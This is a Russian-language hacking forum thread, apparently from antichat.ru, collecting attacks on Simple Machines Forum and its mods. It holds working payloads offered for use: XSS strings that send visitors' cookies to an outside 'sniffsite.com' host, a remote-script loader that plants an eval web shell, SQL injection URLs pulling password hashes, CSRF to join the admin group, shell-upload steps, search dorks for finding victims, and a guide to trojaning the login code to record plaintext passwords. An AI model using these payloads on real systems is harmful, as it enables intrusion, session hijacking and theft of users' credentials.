![]() |
[Обзор уязвимостей Simple Machines Forum]
[SMF 1.0 Beta 5 Public]
XSS Удаленный пользователь может выполнить XSS нападение. SMF не фильтрует данные, представленные пользователем в тэге '[size]'. Пример: Код:
size=expression(eval(unescape(document.URL. substring(document.URL.length-41,document.URL. length))))]Big Exploit[/size]SQL Injection Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре 'msg'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Пример: Код:
http://[target]/index.php?action=post;msg= 1%20UNION%20SELECT%20memberName, 0,passwd,0,0%20FROM%20smf_members %20WHERE%201/*;topic=8.0; sesc=[VALIDSESCIDHERE]PHP код:
XSS XSS уязвимость через BB коды. Пример: Код:
[size=0pt][sub][^color=#e1e1e1]g[img]http://re [flash=200,200]http://w onerror=img=new/**/Image();a=String.fromCharCode(?,?,$);img.src=a+document.cookie;this.style.display='none' and end[/flash][/img][/color][/sub][/size]XSS Уязвимость существует из-за недостаточной обработки входных данных в поле "X-Forwarded-For" HTTP заголовка. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта при просмотре злонамеренных данных с помощью "View all members". [SMF 1.1 RC2] Lock Topics Remote Exploit: PHP код:
PHP код:
SQL Injection Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "cur_cat" в сценарии Sources/ManageBoards.php во время добавления нового форума. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. [SMF 1.1.2] XSS Обнаруженные уязвимости позволяют удаленному пользователю обойти ограничения безопасности и скомпрометировать целевую систему. 1. Уязвимость существует из-за недостаточной обработки входных данных во время создания или редактирования сообщения форума. Удаленный пользователь может внедрить в сообщение произвольный PHP сценарий и выполнить его на системе с привилегиями Web сервера. 2. Уязвимость существует из-за недостаточного механизма выбора случайных файлов в механизме звуковой CAPTCHA. Удаленный пользователь может произвести брут-форс атаку. |
[SMF 1.1.2]
XSS Отсутствует фильтрация atachment filename Способы эксплуатации: 1. Получение cookie Создаем сообщение и прикрепляем к нему файл со следующим имененем: Код:
attachfilename<img src=. width=1 height=1 onerror=javascript:new Image().src='http://sniffsite.com/s.gif?'+document.cookie>.txtПолучаем cookie 2. Получение web shell'a Создаем сообщение и прикрепляем к нему файл со следующим имененем: Код:
name<img src=. width=1 height=1 onerror=javascript:var s=document.createElement('script');s.src='http: //site.com/smfexp.js';document.documentElement.firstChild. appendChild(s);>.txtЭто код простейшего динамического загрузчика скриптов http://site.com/smfexp.js - адрес загружаемого скрипта smfexp.js изменяет шаблон default темы: вставляет в /smf/Themes/default/index.php shell smfexp.js: PHP код:
index.php будет содержать следующий код: Код:
@eval($_POST['cd']);Код:
new Image().src='http://sniffsite.com/s.gif?'+document.cookie; |
Simple Machines Forum 1.1.3 Remote Blind SQL Injection Exploit
#SMF 1.1.3 Extremely fast Blind SQL Injection Exploit! # -Binary Search # -Multi-Threaded # -NO benchmark()'s # #Two SQL Injection flaws. #Works with magic_quotes_gpc=On or Off. #Total Bypass of SMF's SQL Injection filter. Active-XSS in SMF <= 1.1.3 Faq по Smf (Заливка шелла) |
[ IP-Spoofing (c) antichat.ru ] Поддержка X_FORWARDER_FOR позволяет обходить бан, использовать краденную через XSS сессию админа в обход привязки по айпи. Оперативно изменять Ip в X_FORWARDER_FOR вам помогут Proxomitron 4.*(http://www.proxomitron.domtech.ru/index.htm) либо Odysseus 2.*(http://www.wastelands.gen.nz/odysseus/index.php) [ DEBUG (c) antichat.ru ] Раскрытие информации о сервере. Достаточно указать в урл debug=1 : http://smf.com/index.php?debug=1 Passive XSS in SMF 1.1.4 Site.com/component/option,com_smf/Itemid,8'XSS,1/topic,1.0/ Site.com/component/option,com_smf/Itemid,5/topic,1.XSS/ phpRaid <= 3.0.b3 (phpBB/SMF) Remote File Inclusion Vulnerabilities SMF Forum Mambo Component <= 1.3.1.3 Include Vulnerability eFiction <= 3.1.1 (path_to_smf) Remote File Include Vulnerabilities |
SMF 1.1.4 - Add User In Group [CSRF]
SMF 1.1.4 - Add User In Group [CSRF]
Код:
|| *************** || Dork (SID): inurl:index.php inurl:sid= "SMF 1.1.4" Код:
</html> Код:
forum/path/index.php?action=membergroups;sa=members;group=groupid;toAdd=usertoadd&add=Add+Members&sc=sid |
passive XSS
passive XSS in SMF mod Shoutbox Simple Machines Forum "SMF Shoutbox" Mod 1.16b-1.14 Reference: http://custom.simplemachines.org/mods/index.php?mod=412 Bug:Persistent XSS SMF Shoutbox is a popular shoutbox mod for Simple Machines Forum.The content of a post variable used to hold the user shout is stored in the database and then displayed to the visitors without being properly filtered.So we can insert HTML or Javascript code in the database which is then displayed in the shoutbox (which is usually at the index page of the forum). Note:the content of this variable is also stored in an html file (sbox.history.html)residing in the main folder where SMF is installed so it is possible to insert and then execute php code under some server configurations. Vulnerable versions: 1.16b down to 1.14 Search Engines query: "powered by smf 1.1" "SMF Shoutbox" Vuln code -In sboxDB.php function missinghtmlentities() fails to sanitize input passed to the shoutbox form Exploit All we have to do is pass to the shoutbox form a string starting with '&#' and ending with ';' Most sites configuration doesnt enable guest visitors to post comments so you should create an account and login in order to exploit.SMF Shoutbox is usually in the index page of the forum so you could easily exploit this issue to collect Admins and user cookies,hijack sessions,etc Pass this string to the shoutbox &#<script>alert(String.fromCharCode(88,83,83))</script>; If successful every visitor of the page should see an alert saying 'XSS' Note: We can inject php code but the output file (sbox.history.html)has an .html extension so in order for the code to execute the server must be configured to parse .html files for php code which is not the default configuration. |
5 Способов залить шелл. https://forum.antichat.ru/thread43633.html
Кстати способ с редактированием шаблонов по сути является и универсальной читалкой файлов из админки. Льем левую тему, можно даже без файлов. Ставим ей путь "/" и юзаем до посинения читалку прибавляя не index.template.php как в вышесказанной теме, а все что угодно (/etc/passwd, /home/admin/public_html/config.php к примеру) Там стоит фильтр только на ../ в самой переменной, но он нам и не нужен. |
SMForum audio Captcha Breaking
Deciphering the Simple Machines Forum audio Captcha
http://securityvulns.ru/Tdocument705.html Вкратце и по сути. Найден новый способ обхода капча кода в SMF. Автор существенно усовершенствовал алгоритм Шанкара, и обошел пропатченную капчу. Фишка в недостаточной рандомизации звука каждой буквы. Из искомого файла выделяются отдельные буквы, затем сравниваются с эталоном. Также автор поломал капчу в PHP-Nuke ( уязвимость в недостаточной длинне парольной строки и рандомной генерации хеша) используя радужную таблицу хешей на 1 миллион комбинаций. От себя добавлю, что используя описанный алгоритм, открываются новые возможности по обходу капчи и во многих других продуктах и сервисах, заботящихся об ущербных пользователях использующих аудио-подтверждение как тест тьюринга. |
Simple Machines Forum <= 1.1.4 Sql Injection Vulnerability
Simple Machines Forum <= 1.1.4 Sql Injection Vulnerability
Уязвимость заключается в обходе слеширования addslashes() , используя мультибайтный символ "%a3%27" в кодировке "big5" Код HTML:
#!/usr/bin/python |
SMF <= 1.1.4, 2.0Beta2 COOKIE[topic] SQL-Injection Exploit
Вложений: 1
SMF <= 1.1.4, 2.0Beta2 COOKIE[topic] SQL-Injection Exploit http://www.simplemachines.org/ Уязвимость заключается в неопределенном параметре $topic. Атакующий может определить его значение и выполнить произвольный SQL-запрос в базу данных приложения. Дополнительную уязвимость содержат фильтры безопасности, пропускающие внедренный атакующим запрос, составленный особым образом. Требуется: 1) register_globals=ON 2) database prefix, default "smf_" 3) Mysql => 4.1 c0d3d by Elekt (www.antichat.ru), 13.12.2007 ::FAQ:: Q1: "[-] SMF unvulnerable" - что это значит? A1: Если версия форума действительно <=1.1.4, 2.0Beta2 , то скорее всего серверная настройка - register_globals=Off - не благоприятна Вам. Ничего сделать нельзя. Q2: "[-] MySQL < 4.1" - что это значит? A2: Версия базы данных ниже требуемой. На самом деле проблема скорее не в версии mysql, а в некорректном синтаксисе SQL-inj. Мне точно не известно, почему это происходит, потому что такой проблемы не должно быть. Это неизвестная мне особенность конкретно взятого сервера. Возможно, там стоит IDS или mod_security. Так или иначе - это плохо. Получение данных невозможно, однако остается вариант атаки на отказ в облуживании через benchmark(). Из соображений гуманности я не включил модуль доса форума в паблик эксплоит. Q3: "[-] Prefix is not correct" - что это значит? A3: Префикс таблиц форума отличен от стандартного. Необходим перебор его имени по словарю для mysql4. Возможно автоопределение префикса для mysql 5.х В паблик эксплоите функция не реализована. Q4: "[i] Found error." A4: Найдена ошибка. 1) Может возникнуть при нестабильном коннекте вашего интернет подключения. Рекомендуется перезапустить эксплоит. 2) Также данная ошибка иногда возникает, если вы не указываете айди админа и доверяете эксплоиту определить его самостоятельно. Данный баг связан с различиями в структуре таблиц форума разных версий. Рекомендуется указывать айди админа ключом "-i". perl smf114expl.pl -h www.target.com -d / -i 1 [i] информация предоставлена с целью ознакомления |
SMForum audio Captcha Breaking
Цитата:
звукового фала в формате WAV, файл создается путем склеивания произвольным образом нескольких файлов с разными звуками, и служит преградой от автоматической регистрации новых пользователей. разработчики включили рандомизацию выходящего WAV файла в скрипте /Sources/Subs-Sound.php но она явно недостаточна, и легко обходится перебором байтов по заданным шаблонам звуков Код:
[blah@localhost smfh]$ ./captcha.pl http://localhost/smf/ редактировании сообщения форума. |
SMF Upload Shell in Attachment
В старых версиях SMF /attachments не закрыт через .htaccess (или если не настроен mod_rewrite апача) 1) Если шифрование имени файла отключено, то: берем шелл(я пользовался с99) и переиминовываем его в c99.php.zip (не ложим в архив,а просто переиминовываем) Теперь загружаем его как аттачмент в любом посте Шелл искать в: Код:
http://[target]/[path]/attachments/c99.php.zipИдем в: Forum->Attachments and Avatars Добавляем php: Allowed attachment extensions: jpg,php Отключаем шифрование имени: Encrypt stored filenames: [ ] Далее аналогично 1) за исключением переименования. |
smf 1.1.2-1.1.3 php injection
Да, да это я про :
Цитата:
файлик Sources/Subs-Post.php PHP код:
|
SMF 1.1.4 Search DOS
Код:
#!/usr/bin/perl |
SMF 1.1.5 Password Cracker
Код:
#!/usr/bin/perl |
Узнаем мыло пользователя Smf (любая версия) через Rss
Узнаем мыло пользователя SMF (любая версия) через RSS Вот нашел небольшой баг в SMF, позволяющий узнать мыльник юзера SMF. Например ты смотришь профайл какого-то юзера, и видишь: E-mail: скрытый. Так вот, ты можешь узнать его мыло! Для чего это надо? Это уже в ваших целях. Итак, начнем. Качаем любой браузер, который поддерживает чтение RSS новостей; я использую Opera. Переходим на наш форум, и видим в строке адреса: Нас интересует то, что возле стрелки. Это и есть подписка на новости. Т.е. если на форуме кто-то напишет сообщение, оно сразу же появиться в меню "Каналы новостей". После нажатия на значок RSS, ждем порядка 10 секунд, и видим: Жмем "Да". Видим, у нас появилась меню "Каналы новостей", кликаем по нему, выбираем название форума. Все, теперь осталось только ждать, когда кто-то напишет сообщение. Написал? - Можете радоваться. Видим это: Вот и все, ребята. Используйте мыло в своих целях. PS: Прошу строго не судить, так как эт мое первое творение. |
Криптографическая атака на Smf
Криптографическая атака на SMF
Заслуживает внимания. _http://forum.antichat.ru/thread81052.html |
Simple Machines Forum <= 1.1.5 Admin Reset Password Exploit (win32)
Смена пароля любого пользователя в SMF <=1.1.5
Обнаружил уязвимость, которая позволяет сменить пароль любому пользователю форума, в том числе администратору, через систему восстановления пароля, не имея доступа к почтовому ящику атакуемого пользователя. Она возможна благодаря предсказуемости кода подтверждения для смены пароля, который генерируется с помощью функции rand(). Уязвимость актуальна, если веб-приложение установлено на платформе win32. http://milw0rm.com/exploits/6392 |
http://milw0rm.com/exploits/6665
Цитата:
|
Simple Machines Forum (SMF) 1.1.6 Remote Code Execution Exploit
Автор: Charles FOL Загрузка gzip-архива с валидным модулем SMF, содержащим шелл, через атачменты форума, а затем непреднамеренная установка этого модуля администратором с помощью CSRF-уязвимости (тэг [img]) http://real.olympe-network.com/releases/19817 |
[QUOTE='[Raz0r]']Simple Machines Forum (SMF) 1.1.6 Remote Code Execution Exploit
http://milw0rm.com/exploits/6993 [QUOTE] На данный момент, эксплойт размешенный по http://milw0rm.com/exploits/6993 не доработанный, рабочий находится по адресу: _http://real.olympe-network.com/releases/19817 |
Simple Machines Forum <= 1.1.6 Code Execution (LFI)
Автор:~elmysterio ( a.k.a us ) Локальный инклуд раннее загруженного атачмента с расширением .gif, содержащим шелл http://milw0rm.com/exploits/7011 |
SMF <= 1.1.6 Karma Description Mod XSS
Код:
<script>alert(/XSS/)</script>Не фильтрируется поле "За что" в моде кармы. |
нехтит :(
Цитата:
|
to yaotzin
в рнр.ini error_reporting = E_ALL & ~E_NOTICE запускать сплойт с параметром -wait 10 |
Цель: Simple Machines Forum (SMF) 1.1.6 и более ранние версии
Воздействие: Выполнение произвольных команд Код эксплоита: http://www.securitylab.ru/bitrix/exturl.php?goto=%2Fpoc%2Fextra%2F362535.php |
Цитата:
[!!] Wrong username/password юзер валидный но всеравно не работает ( |
http://milw0rm.com/exploits/7011
СМФ имеет функцию изменения тем,так вот это уязвимость заключается в изменении настроек тем,а затем присвоения значение $ параметрам конфигурации,так что вы можете изменять настройки смф Итак: Sources/Themes.php 249 в index.php: Код:
'jsoption' => array('Themes.php', 'SetJavaScript')1185 в Sources/Themes.php Код:
function SetJavaScript()1205 в Sources/Themes.php Код:
db_query("Код:
$request = db_query("Код:
while ($row = mysql_fetch_assoc($request))869 в Sources/Themes.php Код:
$context['available_themes'][$row['ID_THEME']][$row['variable']] = $row['value'];904 в Sources/Themes.php Код:
foreach ($context['available_themes'] as $ID_THEME => $theme_data)910 в Sources/Themes.php Код:
$settings = $theme_data;Код:
include($settings['theme_dir'] . '/languages/Settings.' . $user_info['language'] . '.php') |
Уязвимости в модуле Seo4SMF
SQL Иньекции: Файл: seo4smf-redirect.php Куски уязвимого кода: Line 7-13 Код:
$topic = $_GET['t'];Код:
$query = db_query("Код:
$query = db_query("Код:
$request = db_query("SELECT memberName FROM {$db_prefix}members whereКод:
$request = db_query("SELECT subject FROM {$db_prefix}tp_articles whereКод:
http://site/smf/seo4smf-redirect.php?t=-1 union select 1,2,3...,concat(username(),database()) –XSS: Файл: seo4smf-redirect.php Кусок уязвимого кода: Код:
if(!empty($url)){Код:
http://site/seo4smf-redirect.php?a=x%0DLocation:%20javascript:alert(document.cookie); |
покапавшись на днях в интернете наткнулся на такой exploit для SMF 1.1.7 тут www.securitylab.ru
Код:
#!/usr/bin/perl |
http://forum.antichat.ru/showpost.php?p=1047861&postcount=31
Пришлось иметь дело с данным скриптом, действительно корявый, возможные решения проблемы: Код:
$topic = (int)$_GET['t'];Код:
$other = preg_replace('|[^a-z0-9_=,;/\-.]|i', '', $_GET['o']);А тут делаем проверку на соответствие тем: Код:
function seo_verifica_permisos($id, $tipo){http://dump.ru/file/2460593 http://slil.ru/27454401 Пароль: underantichat?! |
Скорее не баги, а так интересные наблюдения, где что хранится у смф:
Ошибка при обработке пакетов: Ошибки при обработке пакетов сохраняется для того чтобы воможность редактирования, возможность сделать сделал резервную копию каждого файла PHP, которго коснулась изменения, но после смены, в 90% случаев они не удаляются администратором и доустпны всем желающим: Код:
http://forum.com/index.php~Код:
http://www.forum.com/Settings.php ~Ошибка расширения файлов: Хранятся тут: Код:
http://forum.com/Packages/installed.listДиректория на сервере: Хранится тут: Код:
http://forum.com/SSI.php?ssi_layersКроме того логи записываются еще и в http://forum.com/error_log |
Трояним SMF (сбор открытых паролей)
И так открываем файл LogInOut.php который лежит в Source Редактируем файл... Ищем следующий код (он в дефолтном виде файла будет на 386 строке) PHP код:
PHP код:
PHP код:
Теперь идем в папку Themes\default (где default имя темы которая стоит на данный момент) Редактируем файл Login.template.php Ищем в нем POST запросы (он в самом внизу находиться) код будет следующим (в случае если ниже код встречаеться в коде то редактируем) PHP код:
Удаляем следующий код PHP код:
Полезная информация: [Код который мы удалили он шифрует пароль в звездочки] Логинимся... и в файле который мы прописали появится логин и пароль :) Автор: .wolmer |
Несколько слов о версии 1.9
1. Ошибках в форме опросов. Смотрим в файле Sources/Pool.php (164-166): Код:
foreach ($_REQUEST['options'] as $id)Бага конечно не серьезная, но все же) 2.Смотрим Sources/Sub-Auth.php, где запрос к базе данных при поиске может достигать глобальных значений, или остановится, когда достигнет указанного предела в php.ini. Например, заходим в Профиль -> Настройка личных сообщений и нажать на поиск пользователей(эта опция находится в нескольких разделах в профиле) после чего откроется небольшое окно http://forum.com/index.php?action=findmember; sesc = [hash] Ошибки скрипта задаются в пхп.ини, Цитата:
Для неверующих: http://forum.com/index.php?action=.xml;sa=news;board=34;limit=999;t ype=rss Цитата:
|
Member Awards 1.02 Blind SQL-Injection
Blind SQL-Инъекция в моде Member Awards Автор: mailbrushЧасть уязвимого кода (ManageAwards.php): PHP код:
Дорк: Код:
inurl:index.php?action=profile;sa=awardsMembers;id=1Цитата:
Код:
http://evilsite.com/smf/index.php?action=profile;sa=awardsMembers;u=1;id=1Код:
http://forum.rockmanpm.com/index.php?action=profile;sa=awardsMembers;u=1;id=1+and+substring(version(),1)=5https://forum.antichat.ru/showpost.p...postcount=7592 https://forum.antichat.ru/threadnav46016-759-10.html |
exploit для Blind SQLinj Member Awards 1.02
Код:
SMF ] MemberAwards 1.0.2 exploitв скрипте: Код:
$SHOW_ALL = 1; - показывать результат брутаКод:
http://scrubs.net.ru/cms/forum/index.php |
Вложений: 1
Member Awards 1.02 Blind SQL-Injection exploit
Vulnerability: mailbrush Code: oRb Thnx: Grey, eLWAux Использует бинарный поиск. В начале скрипта конфиг: $url - урл до smf $member_id - кого брутить $tbl_prefix - префикс таблиц $error - текст ошибки, если награда не найдена. Example: Код:
$ php smf.php |
SMF 1.1.10
АВТОР: HAXTA4OK нужны права админа :( Код:
function EditHoliday()=) собственно сам пример http://127.0.0.1/110/index.php?action=managecalendar;sa=editholiday;hol iday=5 реализация: http://127.0.0.1/110/index.php?action=managecalendar;sa=editholiday;hol iday=5' узнаем кол-во колонок - их 5 из постов GREY'a делаем запрос http://127.0.0.1/110/index.php?action=managecalendar;sa=editholiday;hol iday=5+and+(%23)%0Asubstring(version(),1,1)=5 у меня 5 ветка P.S. прошу сина не гнать на меня , мой первый баг найденный в SMF |
Цитата:
если для изменения параметра theme_dir использовать POST запрос к Profile.php |
Бекдор?!
Сегодня наткнулся на пост испанского вроде бы хакера WHK, который нашел бекдор в СМФ! http://www.simplemachines.org/community/index.php?action=mascot Он посмотрел исходники Sources/Who.php - 660 строка: Код:
function Mascot()Код:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> |
| Время: 22:12 |